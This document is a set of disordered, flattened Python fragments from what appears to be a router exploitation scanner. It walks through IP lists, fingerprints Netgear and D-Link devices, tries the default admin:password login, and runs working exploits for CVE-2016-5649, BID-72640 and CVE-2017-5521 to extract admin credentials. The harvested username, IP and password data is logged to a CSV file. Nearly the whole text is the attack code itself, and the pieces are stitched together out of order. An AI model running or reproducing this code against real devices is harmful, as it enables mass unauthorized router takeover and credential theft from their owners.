def cve_2016_5649(router): exploit = 'CVE-2016-5649' aux.ex_print('action', '[*] Test for vulnerability ' + exploit + ' --> ', 0) r = requests.get(router.url + '/BSW_cxttongr.htm') soup = BeautifulSoup(r.text, 'lxml') data = [] for table_row in soup.select("tr"): bdata = table_row.findAll('b') if len(bdata) > 0: data.append(bdata) try: password = re.search('"(.+?)"', str(data[1])).group(1) username = '******' aux.ex_print('positive', ' Vulnerable! ', 1) aux.ex_print('info', '\tCredentials found: ', 0) aux.ex_print('positive', username + ':' + password, 1) router.exploit = exploit router.username = username router.password = password router.vulnerable = True return 1 except: aux.ex_print('error', ' NOT vulnerable', 1) router.exploit = 'NOT VULN' router.vulnerable = False return 0
def bid_72640(router): username = '******' password = "" exploit = 'BID-72640' aux.ex_print('action', '[*] Test for vulnerability ' + exploit + ' --> ', 0) headers = { 'SOAPAction': 'urn:NETGEAR-ROUTER:service:LANConfigSecurity:1#GetInfo', 'Content-Type': 'application/x-www-form-urlencoded', 'Content - Length': '1' } data = 'POST / HTTP/1.1' r = requests.post(router.url + '/', headers=headers, data=data) try: password = re.search('<NewPassword>(.+?)</NewPassword>', str(r.content)).group(1) except: aux.ex_print('error', ' NOT vulnerable', 1) return 0 else: aux.ex_print('positive', ' Vulnerable! ', 1) aux.ex_print('info', '\tCredentials found: ', 0) aux.ex_print('positive', username + ':' + password, 1) router.exploit = exploit router.username = username router.password = password router.vulnerable = True return 1
def exploit_act(router): model = router.model if not model in exploits: aux.ex_print('error', '\t[-] Exploit NOT found for this model', 1) router.exploit = 'NO EXP' return 0 else: try: a = exploits[model](router) return a except: aux.ex_print('error', '\t[-] NOT vulnerable', 1) router.exploit = 'NOT VULN' return 0
def ng_login1(router): # Test admin:password, passed as a base64 encoded string headers = { "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Authorization": "Basic YWRtaW46cGFzc3dvcmQ=", "DNT": "1", "Connection": "close", "Cache-Control": "max-age=0" } if requests.get(router.url + '/', headers=headers, verify=False).status_code == requests.codes.ok: aux.ex_print('info', '\tDefault credentials in use: ', 0) aux.ex_print('positive', 'admin:password', 1) router.default_login = True router.username = '******' router.password = '******' router.vulnerable = True router.exploit = "Default PWD" return 1 else: aux.ex_print('error', '\t[-] Default credentials not in use', 1) return 0
def __init__(self, opt): self.ip = opt.ip self.open_ports = [] aux.ex_print('info', '\nTesting: ' + self.ip, 1) aux.ex_print('action', '[*] Try to detect web server on default ports...', 1) if self.__check_webserver(opt) == 0: aux.ex_print('error', '\t[-] Brand/Model not found! ', '1')
if args.output_file: opt.o_file = True opt.o_file_name = args.output_file aux.banner(__version__) if opt.single_ip: router = classes.Router(opt) del router else: i = 0 with open(opt.list_file, 'r') as ip_list: for line in ip_list: i += 1 line = line.replace("\n", "") opt.ip = line aux.ex_print("info", "Processing IP number " + str(i) + " of " + str(aux.file_len(opt.list_file)), 1) router = classes.Router(opt) router.open_ports = [] # Write to outfile the results even the router is not exploitable if opt.o_file: output = open(opt.o_file_name, 'a') if router.vulnerable: output.writelines(router.model + ',' + router.ip + ',' + router.port + ',' + str( router.vulnerable) + ',' + router.exploit + ',' + router.username + ',' + router.password + '\n') else: if router.model != '': output.writelines( router.model + ',' + router.ip + ',' + router.port + ',' + router.exploit + '\n') del router output.close() ip_list.close()
def cve_2017_5521(router): token = '' exploit = 'CVE-2017-5521' aux.ex_print('action', '[*] Test for vulnerability ' + exploit + ' --> ', 0) token = re.search('id=(.+?)"', str(router.body)).group(1) if token != '': r = requests.post(router.url + '/passwordrecovered.cgi?id=' + token, verify=False, timeout=2) if r.text.find('left\">') != -1: username = (repr( scrape(r.text, 'Router Admin Username</td>', '</td>'))) username = scrape(username, '>', '\'') password = (repr( scrape(r.text, 'Router Admin Password</td>', '</td>'))) password = scrape(password, '>', '\'') if username == "i_dont_speak_english": username = (scrape(r.text[r.text.find('left\">'):-1], 'left\">', '</td>')) password = (scrape(r.text[r.text.rfind('left\">'):-1], 'left\">', '</td>')) else: aux.ex_print('error', 'NOT vulnerable', 1) router.exploit = 'NOT VULN' router.vulnerable = False return 0 # html encoding pops out of nowhere, lets replace that password = password.replace("#", "#") password = password.replace("&", "&") aux.ex_print('positive', ' Vulnerable! ', 1) aux.ex_print('info', '\tCredentials found: ', 0) aux.ex_print('positive', username + ':' + password, 1) router.exploit = exploit router.username = username router.password = password router.vulnerable = True else: aux.ex_print('error', 'NOT vulnerable', 1) router.exploit = 'NOT VULN' router.vulnerable = False return 0 # return 1 return 1
def test(): print("debug") aux.ex_print('positive', '\tExploit!!!!', 1) return 1
def __check_webserver(self, opt): for t in self.__default_ports: if self.__is_open(t) == 1: self.open_ports.append(t) if not len(self.open_ports) > 0: aux.ex_print('error', '\t[-] Web server not found', '1') return 1 aux.ex_print('positive', '\t[+] Found open ports: ' + str(self.open_ports), '1') protocol = ["http://", "https://"] # Try every combination of port/protocol to find an usable web server for port in self.open_ports: for prot in protocol: try: url_to_test = prot + self.ip + ':' + port r = requests.get(url_to_test, verify=False, timeout=3) except requests.exceptions.RequestException as e: aux.ex_print('error', 'DEBUG: Error in request', 1) pass else: self.body = BeautifulSoup(r.text, 'lxml') self.header = r.headers # we have found a webserver on the open port aux.ex_print('positive', '\t[+] Found web server: ' + url_to_test, '1') self.url = url_to_test # try to detect if is a netgear, a dlink... aux.ex_print('action', '[*] Try to identify brand/model...', 1) if aux.is_netgear(self.header) != '': self.netgear = True self.model = aux.is_netgear(self.header) self.port = port aux.ex_print('positive', '\t[+] Found Brand/Model : ' + self.model, '1') aux.ex_print('action', '[*] Check default creds ...', '1') if exploit.login_act(self) == 1: r.close() return 1 else: aux.ex_print('action', '[*] Search for exploit ...', '1') exploit.exploit_act(self) r.close() return 1 elif aux.is_dlink(self.body): self.dlink = True self.model = aux.model r.close() return 1 r.close() return 0